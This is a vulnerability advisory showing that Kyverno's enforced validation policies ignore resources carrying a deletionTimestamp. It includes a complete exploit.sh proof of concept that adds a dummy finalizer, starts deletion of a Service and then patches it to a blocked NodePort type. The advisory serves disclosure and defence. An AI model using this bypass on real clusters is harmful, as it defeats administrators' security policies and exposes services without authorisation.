# validationFailureAction: Enforce policies may be bypassed by editing resources during finalization

All Kyverno components, including validation, appear to ignore resources with a deletionTimestamp. A ClusterPolicy or Policy with validationFailureAction: Enforce may be bypassed by beginning deletion (finalization) of a resource before updating it. Deletion may last indefinitely if an unhandled finalizer is added to the resource before beginning deletion.

Many Kubernetes resources such as Pods are effectively "dead" as soon as they begin terminating. Even though the image: field of a Pod is mutable, modifications to a Pod's spec: are ignored during termination and the new image is not executed. Other resource kinds, however, may not handle finalization, or may handle it inconsistently. ConfigMaps are completely usable during finalization. It appears that updates made to LoadBalancer Services during finalization may be ignored and remain pending. However, a NodePort Service updated during finalization will create a listening NodePort. The behavior of CRDs during finalization will vary with each custom controller's implementation.

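For example, the claim about ConfigMaps can be checked with a short sequence like the following (a rough sketch; the `example.com/test` finalizer name is arbitrary):

```sh
# Sketch: a ConfigMap remains readable and writable while stuck in finalization.
# The finalizer name example.com/test is arbitrary.
kubectl create configmap demo --from-literal=key=before
kubectl patch configmap demo -p '{"metadata":{"finalizers":["example.com/test"]}}'
kubectl delete configmap demo --wait=false
# The ConfigMap now has a deletionTimestamp but still exists and accepts updates:
kubectl patch configmap demo -p '{"data":{"key":"after"}}'
kubectl get configmap demo -o jsonpath='{.data.key}'
# Clean up by removing the finalizer so deletion can complete:
kubectl patch configmap demo --type=merge -p '{"metadata":{"finalizers":null}}'
```
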
Because most policies and RBAC would not deny adding finalizers or deleting resources, I believe this allows an attacker to bypass any Kyverno policy. Impact is limited if fields of the resource are immutable or updates to the resource are ignored during deletion. Policies on Pods appear to be safe because updates to the resource are ignored during termination.

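To see whether a particular subject already has the permissions this bypass relies on, `kubectl auth can-i` can be used along these lines (the service account name is only a placeholder):

```sh
# Adding a finalizer is an ordinary metadata update, so only patch/update and
# delete permissions on the target resource are needed for the bypass.
kubectl auth can-i patch services --as=system:serviceaccount:default:example-sa
kubectl auth can-i delete services --as=system:serviceaccount:default:example-sa
```
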
I have not reviewed Kyverno's behavior for mutation, generation, image verification, etc., but it looks like Kyverno handles deletionTimestamp similarly in each of them. I am less sure what users' security expectations are for these and whether they should also be considered vulnerabilities. See the relevant areas of Kyverno's source code for each feature's handling of deletionTimestamp.

Please see the proof-of-concept `exploit.sh` script below. Tested on Kyverno v1.9.2 on both k3s and vanilla Kubernetes v1.26.3. The hostname in the final curl command may need to be edited depending on your environment. You may also need to run the commented-out helm repo commands.

```sh
#!/bin/sh
# If running this file as a shell script, print each command when run:
set -x
# Install kyverno/kyverno helm chart version 2.7.2 (appVersion v1.9.2)
# helm repo add kyverno https://kyverno.github.io/kyverno/
# helm repo update
helm install kyverno kyverno/kyverno --version 2.7.2 -n kyverno --create-namespace --set replicaCount=1 --wait
# The only change from the official policy is validationFailureAction: Enforce
# https://kyverno.io/policies/best-practices/restrict_node_port/restrict_node_port/
kubectl apply -f - <<'EOF'
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: restrict-nodeport
  annotations:
    policies.kyverno.io/title: Disallow NodePort
    policies.kyverno.io/category: Best Practices
    policies.kyverno.io/minversion: 1.6.0
    policies.kyverno.io/severity: medium
    policies.kyverno.io/subject: Service
    policies.kyverno.io/description: >-
      A Kubernetes Service of type NodePort uses a host port to receive traffic from
      any source. A NetworkPolicy cannot be used to control traffic to host ports.
      Although NodePort Services can be useful, their use must be limited to Services
      with additional upstream security checks. This policy validates that any new Services
      do not use the `NodePort` type.
spec:
  validationFailureAction: Enforce
  background: true
  rules:
  - name: validate-nodeport
    match:
      any:
      - resources:
          kinds:
          - Service
    validate:
      message: "Services of type NodePort are not allowed."
      pattern:
        spec:
          =(type): "!NodePort"
EOF
kubectl wait ClusterPolicy restrict-nodeport --for='jsonpath={.status.ready}=true'
# Podinfo includes a ClusterIP podinfo Service, which is not blocked by the Kyverno policy
kubectl apply -k github.com/stefanprodan/podinfo//kustomize
kubectl wait deployment podinfo --for condition=Available=True
# The following is correctly denied due to the above policy:
kubectl patch service podinfo -p '{"spec":{"type":"NodePort","ports":[{"port":9898,"nodePort":32000}]}}'
# But instead, you can add a finalizer and begin deletion of the Service:
kubectl patch service podinfo -p '{"metadata":{"finalizers":["bburky.com/hax"]}}'
kubectl delete service podinfo --wait=false
# Because nothing handles the bburky.com/hax finalizer, deletion will never complete
# Typical policies and RBAC do not disallow adding finalizers or deletion
# The following is incorrectly allowed because the resource has a deletionTimestamp:
# https://github.com/kyverno/kyverno/blob/2f1ac317f4f6a5b2799f37b61237f68dd4ea35c6/pkg/webhooks/resource/validation/validation.go#L89-L91
kubectl patch service podinfo -p '{"spec":{"type":"NodePort","ports":[{"port":9898,"nodePort":32000}]}}'
# Wait a couple seconds for the Service to apply the update
sleep 3
# Even though the NodePort Service is being deleted, the update is still applied and the Service is exposed via a NodePort:
curl http://localhost:32000/
```
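
After running the proof of concept, the pending deletion can be completed by removing the unhandled finalizer, roughly as follows (cleanup of the other installed components is optional):

```sh
# Remove the unhandled finalizer so the pending deletion of the Service completes
kubectl patch service podinfo --type=merge -p '{"metadata":{"finalizers":null}}'
# Optional cleanup of the rest of the proof of concept
kubectl delete -k github.com/stefanprodan/podinfo//kustomize --ignore-not-found
kubectl delete clusterpolicy restrict-nodeport
helm uninstall kyverno -n kyverno
```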